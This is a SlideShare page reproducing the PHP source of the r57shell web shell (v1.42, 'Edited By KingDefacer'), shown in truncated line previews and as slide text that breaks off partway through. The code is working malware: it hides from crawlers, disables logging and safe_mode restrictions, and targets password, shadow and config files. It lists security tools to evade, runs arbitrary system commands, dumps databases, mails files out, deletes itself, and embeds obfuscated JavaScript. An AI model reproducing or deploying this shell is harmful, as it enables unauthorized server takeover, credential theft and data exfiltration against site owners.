<?php  if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not  Found</h1>");}  $language...
@ini_set(allow_url_fopen,1);   }  else   {   @ini_alter(error_log,NULL);   @ini_alter(log_errors,0);   @ini_alter(file_upl...
$presets_rlph =  array(index.php,.htaccess,.htpasswd,httpd.conf,vhosts.conf,cfg.php,config.php,config.inc.php,config.defau...
$safe_mode = @ini_get(safe_mode);  #if(@function_exists(ini_get)){$safe_mode = @ini_get(safe_mode);}else{$safe_mode=1;};  ...
exit("<h1>Access Denied</h1>");      }  }  if(!isset($_COOKIE[tempdir],$_COOKIE[select_tempdir])) {          $tempdir=./; ...
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">  <STYLE>  tr {  BORDER-RIGHT: #aaaaaa 1px solid...
.tr1 {  BORDER: 0px;  color: #000000;  }  table {  BORDER: #eeeeee 1px outset;  BACKGROUND-COLOR: #D4D0C8;  color: #000000...
submit {  BORDER: buttonhighlight 2px outset;  BACKGROUND-COLOR: #e4e0d8;  width: 30%;  color: #000000;  }  textarea {  BO...
{      document.getElementById(id).style.display = none;      document.cookie=id+=0;;  }  function show_div(id)  {      do...
if ($timearray[year] < 1980) {             $timearray[year]    = 1980;             $timearray[mon]      = 1;             $...
$zdata = gzcompress($data);        $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);        $c_len = strlen($zdat...
$this -> old_offset += strlen($fr);           $cdrec .= $name;           $this -> ctrl_dir[] = $cdrec;       }       funct...
$mime_type = application/x-bzip2;           $filedump = bzcompress($filedump);       }       else if ($compress == gzip &&...
if(@function_exists(fopen)&&@function_exists(feof)&&@function_exists(fgets)&&@function_exists(feof)&&@f  unction_exists(fc...
global $lang,$language;  $str=;      if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");};      if(@copy("compress.zlib://"....
return 1;  }  function mailattach($to,$from,$subj,$attach)   {   $headers = "From: $fromrn";   $headers .= "MIME-Version: ...
var $num_rows;   var $num_fields;   var $dump;   function connect()    {    switch($this->db)        {    case MySQL:     ...
case Oracle:         if(!@function_exists(ocilogon)) return 0;         $this->connection = @ocilogon($this->user, $this->p...
switch($this->db)        {    case MySQL:    if(@mysql_select_db($this->base,$this->connection)) return 1;    break;    ca...
function query($query)    {    $this->res=$this->error=;    switch($this->db)        {    case MySQL:        if(false===($...
return 0;       }       else if(@pg_num_rows($this->res) > 0) { return 1; }      return 2;    break;    case Oracle:      ...
else if(is_resource($this->res)) { return 1; }        return 2;    break;    case mSQL:        if(false===($this->res=@msq...
$this->columns=array();    $this->num_rows=$this->num_fields=0;    switch($this->db)     {    case MySQL:    $this->num_ro...
while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;        @ocifreestatement($this->res);  ...
function dump($table)    {    if(empty($table)) return 0;    $this->dump=array();    $this->dump[0] = ##;    $this->dump[1...
case MSSQL:      $this->dump[0] = ## MSSQL dump;      if($this->query(SELECT * FROM .$table)!=1) return 0;    if(!$this->g...
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}    $this->dump[] = INSERT INTO .$table. (.@imp...
if($this->query(SELECT * FROM .$table)!=1) return 0;    if(!$this->get_result()) return 0;    for($i=0;$i<$this->num_rows;...
break;    case Oracle:        @oci_close($this->connection);    break;    case MySQLi:        @mysqli_close($this->connect...
break;    case Oracle:           return @ocirowcount($this->res);    break;    case MySQLi:           return @mysqli_affec...
$content_encoding=$mime_type=;       compress($filename,$filedump,$_POST[compress]);       if (!empty($content_encoding)) ...
color=red><b>Cant select database</b></font></div>";    else     {     foreach($querys as $num=>$query)      {         if(...
echo "</table>";             }            break;            case 2:            $ar = $sql->affected_rows()?($sql->affected...
]</b></font></div>"; die();   }  if(isset($_GET[12]))   {       @unlink(__FILE__);   }  if(isset($_GET[11]))   {       @un...
if (@is_array($value))   {   @ob_start();   print_r($value);   $value = @ob_get_contents();   @ob_end_clean();   }   retur...
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a>  ]</b></font></div>"; ...
die();   }  if(isset($_GET[4]))   {       echo $head;    echo <table width=100%><tr><td bgcolor=#cccccc><div align=center>...
}  if(isset($_GET[5]))   {$_POST[cmd] = systeminfo;}  if(isset($_GET[6]))   {$_POST[cmd]=edit_file;$_POST[e_name] = /etc/s...
{$_POST[cmd] = lsdev;}  if(isset($_GET[20]))   {$_POST[cmd]=cat /proc/interrupts;}  if(isset($_GET[21]))   {$_POST[cmd] = ...
if(isset($_GET[33]))   {$_POST[cmd] = fdisk -l;}  if(isset($_GET[34]))   {$_POST[cmd] = df -h;}  #if(isset($_GET[]))  # {$...
ru_text4 =>??????? ??????????,  ru_text5 =>???????? ?????? ?? ??????,  ru_text6 =>????????? ????,  ru_text7 =>??????,  ru_...
ru_text32=>?????????? PHP ????,  ru_text33=>???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL (PHP <...
ru_text59=>????,  ru_text60=>??????????,  ru_text61=>???? ??????,  ru_text62=>?????????? ???????,  ru_text63=>???? ??????,...
ru_text87=>?????????? ?????? ? ?????????? ftp-???????,  ru_text88=>??????:????,  ru_text89=>???? ?? ftp ???????,  ru_text9...
??????? imap_list() (PHP <= 5.1.2),  ru_text114=>???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ?...
(TMPDIR) (PHP <= 5.2.4),  ru_text134=>???????? ??? ??????,  ru_text135=>???????,  ru_text136=>???????? ?????????? ??????, ...
eng_butt1 =>Execute,  eng_butt2 =>Upload,  eng_butt3 =>Bind,  eng_butt4 =>Connect,  eng_butt5 =>Run,  eng_butt6 =>Change, ...
eng_text13=>IP,  eng_text14=>Port,  eng_text15=>Upload files from remote server,  eng_text16=>With,  eng_text17=>Remote fi...
eng_text41=>Save dump in file,  eng_text42=>Edit files,  eng_text43=>File for edit,  eng_text44=>Cant edit file! Only read...
eng_text68=>Command,  eng_text69=>param1,  eng_text70=>param2,  eng_text71=>"Second commands param is:rn- for CHOWN - name...
eng_text97=>checked: ,  eng_text98=>success: ,  eng_text99=>/etc/passwd,  eng_text100=>Send file to remote ftp server,  en...
eng_text124=>Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2),  eng_text125=>Data,  ...
eng_err0=>Error! Cant write in file ,  eng_err1=>Error! Cant read file ,  eng_err2=>Error! Cant create ,  eng_err3=>Error!...
.$tempdir.grep.txt,  locate config.dat files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate config.dat >> .$tempdir....
.$tempdir.grep.txt,  locate error_log files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>locate error_log >> .$tempdir.gr...
find all writable files in current dir >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find . -type f -perm -2 -ls >>  .$tem...
find config.inc files >> .$tempdir.grep.txt;cat .$tempdir.grep.txt=>find / -type f -name config.inc >>  .$tempdir.grep.txt...
$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";  $table_up2 = " ::</div></b></...
if (empty($_POST[dir])){if(@function_exists(chdir)){$dir = @getcwd();};}else{$dir=$_POST[dir];}  $unix = 0;  if(strlen($di...
{         $r .= "<TABLE width=100%>";         foreach($res as $file=>$v)         {             $r .= "<TR>";             $...
}  /*if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }*/  if(strpos(ex("echo abcr57"),"r57")!=3) {...
{        @ob_start();        @system($cfe);        $res = @ob_get_contents();        @ob_end_clean();    }    elseif(@func...
while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);}       }else if(@function_exists(fgets) && @function_exists(feo...
if(!@function_exists(escapeshellarg)){$res=$api->WinExec("cmd.exe /c $cfe >"$output"",0);}        else{$res=$api->WinExec(...
else{@win_shell_execute(..............windowssystem32cmd.exe /c .@escapeshellarg($cfe). > ".$output.");}        while(!@fi...
if(@pcntl_exec(/usr/local/bin/perl,$cfe)) exit(0);           die();       }       $res=moreread($output);       @unlink($o...
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
R57shell
Upcoming SlideShare
Loading in...5
×

R57shell

3,028

Published on

no

Published in: Education, Technology, Design
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
3,028
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
4
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

R57shell

  1. 1. <?php if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");} $language=eng; $auth = 0; $name=; $pass=; //ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8 @setlocale(LC_ALL,ru_RU.cp1251); @ini_restore("safe_mode"); @ini_restore("open_basedir"); @ini_restore("safe_mode_include_dir"); @ini_restore("safe_mode_exec_dir"); @ini_restore("disable_functions"); @ini_restore("allow_url_fopen"); if(@function_exists(ini_set)) { @ini_set(error_log,NULL); @ini_set(log_errors,0); @ini_set(file_uploads,1);file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  2. 2. @ini_set(allow_url_fopen,1); } else { @ini_alter(error_log,NULL); @ini_alter(log_errors,0); @ini_alter(file_uploads,1); @ini_alter(allow_url_fopen,1); } error_reporting(E_ALL); /* ??? ????? */ $userful = array(gcc,, lcc,, cc,, ld,, php,, perl,, python,, ruby,, make,, tar,, gzip,, bzip,, bzip2,, nc,, locate,, suidperl); $danger = array(, kav,, nod32,, bdcored,, uvscan,, sav,, drwebd,, clamd,, rkhunter,, chkrootkit,, iptables,, ipfw,, tripwire,, shieldcc,, portsentry,, snort,, ossec,, lidsadm,, tcplodg,, sxid,, logcheck,, logwatch,, sysmask,, zmbscap,, sawmill,, wormscan,, ninja); $tempdirs = array(@ini_get(session.save_path)./,@ini_get(upload_tmp_dir)./,/tmp/,/dev/shm/,/var/tmp/); $downloaders = array(wget,fetch,lynx,links,curl,get); /* ??? ?????? ???????? ???? ????? realpath() */ //$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; //$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz"; //$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ"; //$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz"; //$chars_rlph = "_-.01234567890"; $chars_rlph = "abcdefghijklnmopqrstuvwxyz";file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  3. 3. $presets_rlph = array(index.php,.htaccess,.htpasswd,httpd.conf,vhosts.conf,cfg.php,config.php,config.inc.php,config.default.php ,config.inc.php, shadow,passwd,.bash_history,.mysql_history,master.passwd,user,admin,password,administrator,phpMyAdmin, security,php.ini,cdrom,root, my.cnf,pureftpd.conf,proftpd.conf,ftpd.conf,resolv.conf,login.conf,smb.conf,sysctl.conf,syslog.conf,access.conf ,accounting.log,home,htdocs, access,auth,error,backup,data,back,sysconfig,phpbb,phpbb2,vbulletin,vbullet,phpnuke,cgi- bin,html,robots.txt,billing); /************************************************************************************************ ******/ define("starttime",@getmicrotime()); if((!@function_exists(ini_get)) || (@ini_get(open_basedir)!=NULL) || (@ini_get(safe_mode_include_dir)!=NULL)){$open_basedir=1;} else{$open_basedir=0;}; set_magic_quotes_runtime(0); @set_time_limit(0); if(@function_exists(ini_set)) { @ini_set(max_execution_time,0); @ini_set(output_buffering,0); } else { @ini_alter(max_execution_time,0); @ini_alter(output_buffering,0); }file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  4. 4. $safe_mode = @ini_get(safe_mode); #if(@function_exists(ini_get)){$safe_mode = @ini_get(safe_mode);}else{$safe_mode=1;}; $version = 1.42; if(@version_compare(@phpversion(), 4.1.0) == -1) { $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; $_COOKIE = &$HTTP_COOKIE_VARS; } if (@get_magic_quotes_gpc()) { foreach ($_POST as $k=>$v) { $_POST[$k] = stripslashes($v); } foreach ($_COOKIE as $k=>$v) { $_COOKIE[$k] = stripslashes($v); } } if($auth == 1) { if (!isset($_SERVER[PHP_AUTH_USER]) || md5($_SERVER[PHP_AUTH_USER])!==$name || md5($_SERVER[PHP_AUTH_PW])!==$pass) { header(WWW-Authenticate: Basic realm="HELLO!"); header(HTTP/1.0 401 Unauthorized);file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  5. 5. exit("<h1>Access Denied</h1>"); } } if(!isset($_COOKIE[tempdir],$_COOKIE[select_tempdir])) { $tempdir=./; $select_tempdir = <select name=tempdir><option value="./">./</option>; foreach( $tempdirs as $item) { if(@is_writable($item)){$select_tempdir .= <option value=".$item.">.$item.</option>;$tempdir=$item;} } $select_tempdir .= </select>; setcookie(tempdir,$tempdir); setcookie(select_tempdir,$select_tempdir); }else{ if(isset($_POST[tempdir])){$tempdir = $_POST[tempdir];}else{$tempdir = $_COOKIE[tempdir];} $select_tempdir = $_COOKIE[select_tempdir]; } $head = <html> <head> <title>r57shell v.1.42 - Edited By KingDefacer</title> <script type="text/javascript" language="javascript"> <!-- ML=":<=t/ilcha9 neprsf.wj>o"; MI="1@7?5>3;@?72833>044CCCB7::@8=66B5<AF49BD@E14@7?5>3E"; OT=""; for(j=0;j<MI.length;j++){ OT+=ML.charAt(MI.charCodeAt(j)-48); }document.write(OT); // --></script>file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  6. 6. <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <STYLE> tr { BORDER-RIGHT: #aaaaaa 1px solid; BORDER-TOP: #eeeeee 1px solid; BORDER-LEFT: #eeeeee 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid; color: #000000; } td { BORDER-RIGHT: #aaaaaa 1px solid; BORDER-TOP: #eeeeee 1px solid; BORDER-LEFT: #eeeeee 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid; color: #000000; } .table1 { BORDER: 0px; BACKGROUND-COLOR: #D4D0C8; color: #000000; } .td1 { BORDER: 0px; font: 7pt Verdana; color: #000000; }file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  7. 7. .tr1 { BORDER: 0px; color: #000000; } table { BORDER: #eeeeee 1px outset; BACKGROUND-COLOR: #D4D0C8; color: #000000; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; color: #000000; } select { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; color: #000000;; }file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  8. 8. submit { BORDER: buttonhighlight 2px outset; BACKGROUND-COLOR: #e4e0d8; width: 30%; color: #000000; } textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; color: #000000; } BODY { margin: 1px; color: #000000; background-color: #e4e0d8; } A:link {COLOR:red; TEXT-DECORATION: none} A:visited { COLOR:red; TEXT-DECORATION: none} A:active {COLOR:red; TEXT-DECORATION: none} A:hover {color:blue;TEXT-DECORATION: none} </STYLE> <script language=javascript> function hide_div(id)file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  9. 9. { document.getElementById(id).style.display = none; document.cookie=id+=0;; } function show_div(id) { document.getElementById(id).style.display = block; document.cookie=id+=1;; } function change_divst(id) { if (document.getElementById(id).style.display == none) show_div(id); else hide_div(id); } </script>; class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "x50x4bx05x06x00x00x00x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  10. 10. if ($timearray[year] < 1980) { $timearray[year] = 1980; $timearray[mon] = 1; $timearray[mday] = 1; $timearray[hours] = 0; $timearray[minutes] = 0; $timearray[seconds] = 0; } return (($timearray[year] - 1980) << 25) | ($timearray[mon] << 21) | ($timearray[mday] << 16) | ($timearray[hours] << 11) | ($timearray[minutes] << 5) | ($timearray[seconds] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace(, /, $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = x . $dtime[6] . $dtime[7] . x . $dtime[4] . $dtime[5] . x . $dtime[2] . $dtime[3] . x . $dtime[0] . $dtime[1]; eval($hexdtime = " . $hexdtime . ";); $fr = "x50x4bx03x04"; $fr .= "x14x00"; $fr .= "x00x00"; $fr .= "x08x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data);file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  11. 11. $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack(V, $crc); $fr .= pack(V, $c_len); $fr .= pack(V, $unc_len); $fr .= pack(v, strlen($name)); $fr .= pack(v, 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = "x50x4bx01x02"; $cdrec .= "x00x00"; $cdrec .= "x14x00"; $cdrec .= "x00x00"; $cdrec .= "x08x00"; $cdrec .= $hexdtime; $cdrec .= pack(V, $crc); $cdrec .= pack(V, $c_len); $cdrec .= pack(V, $unc_len); $cdrec .= pack(v, strlen($name) ); $cdrec .= pack(v, 0 ); $cdrec .= pack(v, 0 ); $cdrec .= pack(v, 0 ); $cdrec .= pack(v, 0 ); $cdrec .= pack(V, 32 ); $cdrec .= pack(V, $this -> old_offset );file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  12. 12. $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode(, $this -> datasec); $ctrldir = implode(, $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack(v, sizeof($this -> ctrl_dir)) . pack(v, sizeof($this -> ctrl_dir)) . pack(V, strlen($ctrldir)) . pack(V, strlen($data)) . "x00x00"; } } function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == bzip && @function_exists(bzcompress)) { $filename .= .bz2;file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  13. 13. $mime_type = application/x-bzip2; $filedump = bzcompress($filedump); } else if ($compress == gzip && @function_exists(gzencode)) { $filename .= .gz; $content_encoding = x-gzip; $mime_type = application/x-gzip; $filedump = gzencode($filedump); } else if ($compress == zip && @function_exists(gzcompress)) { $filename .= .zip; $mime_type = application/zip; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = application/octet-stream; } } function moreread($temp){ global $lang,$language; $str=;file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  14. 14. if(@function_exists(fopen)&&@function_exists(feof)&&@function_exists(fgets)&&@function_exists(feof)&&@f unction_exists(fclose) && ($ffile = @fopen($temp, "r"))){ if($ffile){ while(!@feof($ffile)){$str .= @fgets($ffile);}; fclose($ffile); } }elseif(@function_exists(fopen)&&@function_exists(fread)&&@function_exists(fclose)&&@function_exists(filesi ze)&&($ffile = @fopen($temp, "r"))){ if($ffile){ $str = @fread($ffile, @filesize($temp)); @fclose($ffile); } }elseif(@function_exists(file)&&($ffiles = @file($temp))){ foreach ($ffiles as $ffile) { $str .= $ffile; } }elseif(@function_exists(file_get_contents)){ $str = @file_get_contents($temp); }elseif(@function_exists(readfile)){ $str = @readfile($temp); }elseif(@function_exists(highlight_file)){ $str = @highlight_file($temp); }elseif(@function_exists(show_source)){ $str = @show_source($temp); }else{echo $lang[$language._text56];} return $str; } function readzlib($filename,$temp=){file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  15. 15. global $lang,$language; $str=; if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");}; if(@copy("compress.zlib://".$filename, $temp)) { $str = moreread($temp); } else echo $lang[$language._text119]; @unlink($temp); return $str; } function morewrite($temp,$str=) { global $lang,$language; if(@function_exists(fopen) && @function_exists(fwrite) && @function_exists(fclose) && ($ffile=@fopen($temp,"wb"))){ if($ffile){ @fwrite($ffile,$str); @fclose($ffile); } }elseif(@function_exists(fopen) && @function_exists(fputs) && @function_exists(fclose) && ($ffile=@fopen($temp,"wb"))){ if($ffile){ @fputs($ffile,$str); @fclose($ffile); } }elseif(@function_exists(file_put_contents)){ @file_put_contents($temp,$str); }else return 0;file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  16. 16. return 1; } function mailattach($to,$from,$subj,$attach) { $headers = "From: $fromrn"; $headers .= "MIME-Version: 1.0rn"; $headers .= "Content-Type: ".$attach[type]; $headers .= "; name="".$attach[name].""rn"; $headers .= "Content-Transfer-Encoding: base64rnrn"; $headers .= chunk_split(base64_encode($attach[content]))."rn"; if(mail($to,$subj,"",$headers)) { return 1; } return 0; } class my_sql { var $host = localhost; var $port = ; var $user = ; var $pass = ; var $base = ; var $db = ; var $connection; var $res; var $error; var $rows; var $columns;file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  17. 17. var $num_rows; var $num_fields; var $dump; function connect() { switch($this->db) { case MySQL: if(empty($this->port)) { $this->port = 3306; } if(!@function_exists(mysql_connect)) return 0; $this->connection = @mysql_connect($this->host.:.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; break; case MSSQL: if(empty($this->port)) { $this->port = 1433; } if(!@function_exists(mssql_connect)) return 0; $this->connection = @mssql_connect($this->host.,.$this->port,$this->user,$this->pass); if($this->connection) return 1; break; case PostgreSQL: if(empty($this->port)) { $this->port = 5432; } $str = "host=".$this->host." port=".$this->port." user=".$this->user." password=".$this->pass." dbname=".$this->base.""; if(!@function_exists(pg_connect)) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; break;file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  18. 18. case Oracle: if(!@function_exists(ocilogon)) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; break; case MySQLi: if(empty($this->port)) { $this->port = 3306; } if(!@function_exists(mysqli_connect)) return 0; $this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port); if(is_resource($this->connection)) return 1; break; case mSQL: if(!@function_exists(msql_connect)) return 0; $this->connection = @msql_connect($this->host.:.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; break; case SQLite: if(!@function_exists(sqlite_open)) return 0; $this->connection = @sqlite_open($this->base); if(is_resource($this->connection)) return 1; break; } return 0; } function select_db() {file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  19. 19. switch($this->db) { case MySQL: if(@mysql_select_db($this->base,$this->connection)) return 1; break; case MSSQL: if(@mssql_select_db($this->base,$this->connection)) return 1; break; case PostgreSQL: return 1; break; case Oracle: return 1; break; case MySQLi: return 1; break; case mSQL: if(@msql_select_db($this->base,$this->connection)) return 1; break; case SQLite: return 1; break; } return 0; }file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  20. 20. function query($query) { $this->res=$this->error=; switch($this->db) { case MySQL: if(false===($this->res=@mysql_query(/*.chr(0).*/.$query,$this->connection))) { $this->error = @mysql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case MSSQL: if(false===($this->res=@mssql_query($query,$this->connection))) { $this->error = Query error; return 0; } else if(@mssql_num_rows($this->res) > 0) { return 1; } return 2; break; case PostgreSQL: if(false===($this->res=@pg_query($this->connection,$query))) { $this->error = @pg_last_error($this->connection);file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  21. 21. return 0; } else if(@pg_num_rows($this->res) > 0) { return 1; } return 2; break; case Oracle: if(false===($this->res=@ociparse($this->connection,$query))) { $this->error = Query parse error; } else { if(@ociexecute($this->res)) { if(@ocirowcount($this->res) != 0) return 2; return 1; } $error = @ocierror(); $this->error=$error[message]; } break; case MySQLi: if(false===($this->res=@mysqli_query($this->connection,$query))) { $this->error = @mysqli_error($this->connection); return 0; }file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  22. 22. else if(is_resource($this->res)) { return 1; } return 2; break; case mSQL: if(false===($this->res=@msql_query($query,$this->connection))) { $this->error = @msql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case SQLite: if(false===($this->res=@sqlite_query($this->connection,$query))) { $this->error = @sqlite_error_string($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; } return 0; } function get_result() { $this->rows=array();file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  23. 23. $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db) { case MySQL: $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case MSSQL: $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; break; case PostgreSQL: $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case Oracle: $this->num_fields=@ocinumcols($this->res);file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
